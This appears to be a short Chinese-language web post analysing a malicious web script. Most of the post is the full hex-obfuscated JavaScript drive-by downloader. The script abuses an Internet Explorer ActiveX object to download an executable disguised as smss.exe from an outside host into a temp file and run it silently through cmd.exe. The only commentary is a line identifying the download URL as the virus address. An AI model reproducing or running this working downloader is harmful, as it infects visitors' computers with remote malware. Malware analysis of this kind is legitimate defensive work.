 
function GnMs(n) { var numberMs = Math.random()*n; return '\x7E\x54\x65\x6D\x70'+Math.round(numberMs)+'\x2E\x74\x6D\x70'; } try { DownUrl='\x68\x74\x74\x70\x3A\x2F\x2F\x31\x36\x61\x2E\x75\x73\x2F\x6F\x4B\x4B\x2F\x73\x6D\x73\x73\x2E\x65\x78\x65'; var MsDF=document.createElement("\x6F\x62\x6A\x65\x63\x74"); MsDF.setAttribute("\x63\x6C\x61\x73\x73\x69\x64","\x63\x6C\x73\x69\x64\x3A\x42\x44\x39\x36\x43\x35\x35\x36\x2D\x36\x35\x41\x33\x2D\x31\x31\x44\x30\x2D\x39\x38\x33\x41\x2D\x30\x30\x43\x30\x34\x46\x43\x32\x39\x45\x33\x36"); var x=MsDF.CreateObject("\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58"+"\x4D\x4C\x48\x54\x54\x50",""); var S=MsDF.CreateObject("\x41\x64\x6F\x64\x62\x2E\x53\x74\x72\x65\x61\x6D",""); S.type=1; x.open("\x47\x45\x54", DownUrl,0); x.send(); MsFname1=GnMs(9999); var F=MsDF.CreateObject("\x53\x63\x72\x69\x70\x74\x69\x6E\x67\x2E\x46\x69\x6C\x65\x53\x79\x73\x74\x65\x6D\x4F\x62\x6A\x65\x63\x74",""); var MsTmp=F.GetSpecialFolder(0); MsFname1= F.BuildPath(MsTmp,MsFname1); S.Open();S.Write(x.responseBody); S.SaveToFile(MsFname1,2); S.Close(); var MsQ=MsDF.CreateObject("\x53\x68\x65\x6C\x6C\x2E\x41\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E",""); Down1=F.BuildPath(MsTmp+'\x5C\x5C\x73\x79\x73\x74\x65\x6D\x33\x32','\x63\x6D\x64\x2E\x65\x78\x65'); MsQ.ShellExecute(Down1,'\x20\x2F\x63 '+MsFname1,"","\x6F\x70\x65\x6E",0); } catch(MsI) { MsI=1; }  

最后顯示下載代碼為：DownUrl='\x68\x74\x74\x70\x3A\x2F\x2F\x31\x36\x61\x2E\x75\x73\x2F\x6F\x4B\x4B\x2F\x73\x6D\x73\x73\x2E\x65\x78\x65'
這是得到病毒文件的地址的代碼

[Ctrl+A 全選注:引入外部Js需再刷新一下頁面才能執(zhí)行]

因為時間問題，暫時就這樣了，有問題跟貼

您可能感興趣的文章: